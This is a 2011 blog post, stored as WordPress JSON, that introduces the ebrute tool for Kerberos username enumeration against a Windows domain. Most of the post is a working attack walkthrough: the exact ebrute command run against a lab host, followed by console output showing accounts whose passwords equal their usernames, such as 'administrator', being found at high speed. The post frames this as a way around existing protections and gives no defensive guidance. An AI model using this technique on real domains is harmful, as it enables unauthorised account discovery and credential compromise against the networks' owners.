{"id":315,"date":"2011-12-20T12:10:02","date_gmt":"2011-12-20T11:10:02","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=315"},"modified":"2011-12-20T12:10:02","modified_gmt":"2011-12-20T11:10:02","slug":"username-enumeration-the-new-way","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2011\/12\/20\/username-enumeration-the-new-way\/","title":{"rendered":"Username enumeration, the new way"},"content":{"rendered":"<p>So we&#8217;ve all played with RID cycling and GetAcct.exe but lately I guess we&#8217;ve not been pulling this out of our bag. Protection against this is now normal so we need a new way to enumerate usernames against a given domain.<br \/>\nNew info on <a href=\"http:\/\/www.r00t.tv\/\" target=\"_blank\">this website<\/a> is pointing towards a tool called <a href=\"http:\/\/www.r00t.tv\/p\/downloads.html\" target=\"_blank\">ebrute<\/a> that will allow enumeration of kerberos without having to take a password guess. On a decent machine against a decent server you&#8217;ll hopefully achive 1,000,000 guesses per minute. Each guess is sent as a single UDP packet that has been stripped down to be as small in size as possible. Download the tool and make sure you have <a href=\"http:\/\/www.microsoft.com\/download\/en\/details.aspx?id=19\" target=\"_blank\">.Net version 2<\/a> or greater installed.<br \/>\nThen it&#8217;s just a simple case of running the tool against the domain:<\/p>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/><\/div><\/td><td><div class=\"bash codecolorer\">C:\\ebrute<span class=\"sy0\">&gt;<\/span>ebrute.exe <span class=\"re5\">-r<\/span> kerbenum <span class=\"re5\">-P<\/span> users.txt <span class=\"re5\">-h<\/span> 192.168.100.1 <span class=\"re5\">-e<\/span> example.com <span class=\"re5\">-t<\/span> <span class=\"nu0\">32<\/span><br \/>\nebrute v0.76 - Edward Torkington<br \/>\nLoading passes...<br \/>\nParsing passes...<br \/>\nUsername not specified <span class=\"br0\">&#40;<\/span>normal behavior <span class=\"kw1\">for<\/span> some plugins - lets <span class=\"kw1\">do<\/span> joey checks<span class=\"br0\">&#41;<\/span><br \/>\nAdded: &nbsp; &nbsp;<span class=\"nu0\">20<\/span>,<span class=\"nu0\">973<\/span> user<span class=\"br0\">&#40;<\/span>s<span class=\"br0\">&#41;<\/span>, <span class=\"nu0\">0<\/span> password<span class=\"br0\">&#40;<\/span>s<span class=\"br0\">&#41;<\/span>, <span class=\"nu0\">1<\/span> host<span class=\"br0\">&#40;<\/span>s<span class=\"br0\">&#41;<\/span>, &nbsp;+ joeycheck <span class=\"nu0\">20<\/span>,<span class=\"nu0\">973<\/span> tasks over <span class=\"nu0\">32<\/span> thread<span class=\"sy0\">\/<\/span>s.<br \/>\nStarting: <span class=\"nu0\">20<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> <span class=\"nu0\">11<\/span>:07:04<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"nu0\">9<\/span><span class=\"br0\">&#93;<\/span> &nbsp;HOST: <span class=\"st_h\">'192.168.100.1'<\/span> <span class=\"sy0\">|<\/span> USER: <span class=\"st_h\">'administrator'<\/span> <span class=\"sy0\">|<\/span> PASS: <span class=\"st_h\">'administrator'<\/span> <span class=\"sy0\">|<\/span> EXTRA: <span class=\"st_h\">'example.com'<\/span> <span class=\"sy0\">|<\/span> Return code: <span class=\"st_h\">'Success'<\/span> <span class=\"br0\">&#91;<\/span><span class=\"br0\">&#93;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"nu0\">21<\/span><span class=\"br0\">&#93;<\/span> &nbsp;HOST: <span class=\"st_h\">'192.168.100.1'<\/span> <span class=\"sy0\">|<\/span> USER: <span class=\"st_h\">'guest'<\/span> <span class=\"sy0\">|<\/span> PASS: <span class=\"st_h\">'guest'<\/span> <span class=\"sy0\">|<\/span> EXTRA: <span class=\"st_h\">'example.com'<\/span> <span class=\"sy0\">|<\/span> Return code: <span class=\"st_h\">'Disabled'<\/span> <span class=\"br0\">&#91;<\/span><span class=\"br0\">&#93;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"nu0\">28<\/span><span class=\"br0\">&#93;<\/span> &nbsp;HOST: <span class=\"st_h\">'192.168.100.1'<\/span> <span class=\"sy0\">|<\/span> USER: <span class=\"st_h\">'Myuser10'<\/span> <span class=\"sy0\">|<\/span> PASS: <span class=\"st_h\">'Myuser10'<\/span> <span class=\"sy0\">|<\/span> EXTRA: <span class=\"st_h\">'example.com'<\/span> <span class=\"sy0\">|<\/span> Return code: <span class=\"st_h\">'Success'<\/span> <span class=\"br0\">&#91;<\/span><span class=\"br0\">&#93;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"nu0\">30<\/span><span class=\"br0\">&#93;<\/span> &nbsp;HOST: <span class=\"st_h\">'192.168.100.1'<\/span> <span class=\"sy0\">|<\/span> USER: <span class=\"st_h\">'MyUser100'<\/span> <span class=\"sy0\">|<\/span> PASS: <span class=\"st_h\">'MyUser100'<\/span> <span class=\"sy0\">|<\/span> EXTRA: <span class=\"st_h\">'example.com'<\/span> <span class=\"sy0\">|<\/span> Return code: <span class=\"st_h\">'Success'<\/span> <span class=\"br0\">&#91;<\/span><span class=\"br0\">&#93;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"nu0\">13<\/span><span class=\"br0\">&#93;<\/span> &nbsp;HOST: <span class=\"st_h\">'192.168.100.1'<\/span> <span class=\"sy0\">|<\/span> USER: <span class=\"st_h\">'myuser34'<\/span> <span class=\"sy0\">|<\/span> PASS: <span class=\"st_h\">'myuser34'<\/span> <span class=\"sy0\">|<\/span> EXTRA: <span class=\"st_h\">'example.com'<\/span> <span class=\"sy0\">|<\/span> Return code: <span class=\"st_h\">'Success'<\/span> <span class=\"br0\">&#91;<\/span><span class=\"br0\">&#93;<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"nu0\">5<\/span><span class=\"br0\">&#93;<\/span> &nbsp;HOST: <span class=\"st_h\">'192.168.100.1'<\/span> <span class=\"sy0\">|<\/span> USER: <span class=\"st_h\">'0,173648178'<\/span> <span class=\"sy0\">|<\/span> PASS: <span class=\"st_h\">'0,173648178'<\/span> <span class=\"sy0\">|<\/span> EXTRA: <span class=\"st_h\">'example.com'<\/span> <span class=\"sy0\">|<\/span> Return code: <span class=\"st_h\">'Unknown'<\/span> <span class=\"br0\">&#91;<\/span>Error, possibly reduce threds <span class=\"br0\">&#40;<\/span>Attempt <span class=\"nu0\">1<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">5<\/span><span class=\"br0\">&#41;<\/span><span class=\"br0\">&#93;<\/span><br \/>\nComplete: <span class=\"nu0\">20<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">12<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">2011<\/span> <span class=\"nu0\">11<\/span>:07:<span class=\"nu0\">12<\/span><br \/>\nStats: &nbsp; &nbsp;00:00:07 &nbsp; &nbsp;<span class=\"br0\">&#40;<\/span>~<span class=\"nu0\">169<\/span>,<span class=\"nu0\">550<\/span> tasks<span class=\"sy0\">\/<\/span>minute<span class=\"br0\">&#41;<\/span> <span class=\"br0\">&#40;<\/span>Performed <span class=\"nu0\">20<\/span>,<span class=\"nu0\">973<\/span> <span class=\"sy0\">\/<\/span> <span class=\"nu0\">20<\/span>,<span class=\"nu0\">973<\/span> tasks<span class=\"br0\">&#41;<\/span><br \/>\nSummary of Authentication Successes:<br \/>\nHOST: <span class=\"st_h\">'192.168.100.1'<\/span> <span class=\"sy0\">|<\/span> USER: <span class=\"st_h\">'administrator'<\/span> <span class=\"sy0\">|<\/span> PASS: <span class=\"st_h\">'administrator'<\/span> <span class=\"sy0\">|<\/span> EXTRA: <span class=\"st_h\">'example.com'<\/span> <span class=\"sy0\">|<\/span> Return code: <span class=\"st_h\">'Success'<\/span><br \/>\nHOST: <span class=\"st_h\">'192.168.100.1'<\/span> <span class=\"sy0\">|<\/span> USER: <span class=\"st_h\">'guest'<\/span> <span class=\"sy0\">|<\/span> PASS: <span class=\"st_h\">'guest'<\/span> <span class=\"sy0\">|<\/span> EXTRA: <span class=\"st_h\">'example.com'<\/span> <span class=\"sy0\">|<\/span> Return code: <span class=\"st_h\">'Disabled'<\/span><br \/>\nHOST: <span class=\"st_h\">'192.168.100.1'<\/span> <span class=\"sy0\">|<\/span> USER: <span class=\"st_h\">'Myuser10'<\/span> <span class=\"sy0\">|<\/span> PASS: <span class=\"st_h\">'Myuser10'<\/span> <span class=\"sy0\">|<\/span> EXTRA: <span class=\"st_h\">'example.com'<\/span> <span class=\"sy0\">|<\/span> Return code: <span class=\"st_h\">'Success'<\/span><br \/>\nHOST: <span class=\"st_h\">'192.168.100.1'<\/span> <span class=\"sy0\">|<\/span> USER: <span class=\"st_h\">'MyUser100'<\/span> <span class=\"sy0\">|<\/span> PASS: <span class=\"st_h\">'MyUser100'<\/span> <span class=\"sy0\">|<\/span> EXTRA: <span class=\"st_h\">'example.com'<\/span> <span class=\"sy0\">|<\/span> Return code: <span class=\"st_h\">'Success'<\/span><br \/>\nHOST: <span class=\"st_h\">'192.168.100.1'<\/span> <span class=\"sy0\">|<\/span> USER: <span class=\"st_h\">'myuser34'<\/span> <span class=\"sy0\">|<\/span> PASS: <span class=\"st_h\">'myuser34'<\/span> <span class=\"sy0\">|<\/span> EXTRA: <span class=\"st_h\">'example.com'<\/span> <span class=\"sy0\">|<\/span> Return code: <span class=\"st_h\">'Success'<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Simples<\/p>\n","protected":false},"excerpt":{"rendered":"<p>So we&#8217;ve all played with RID cycling and GetAcct.exe but lately I guess we&#8217;ve not been pulling this out of our bag. Protection against this is now normal so we need a new way to enumerate usernames against a given domain. New info on this website is pointing towards a tool called ebrute that will [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[116,118,119,117,121,120,113],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/315"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=315"}],"version-history":[{"count":2,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/315\/revisions"}],"predecessor-version":[{"id":317,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/315\/revisions\/317"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=315"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=315"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=315"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}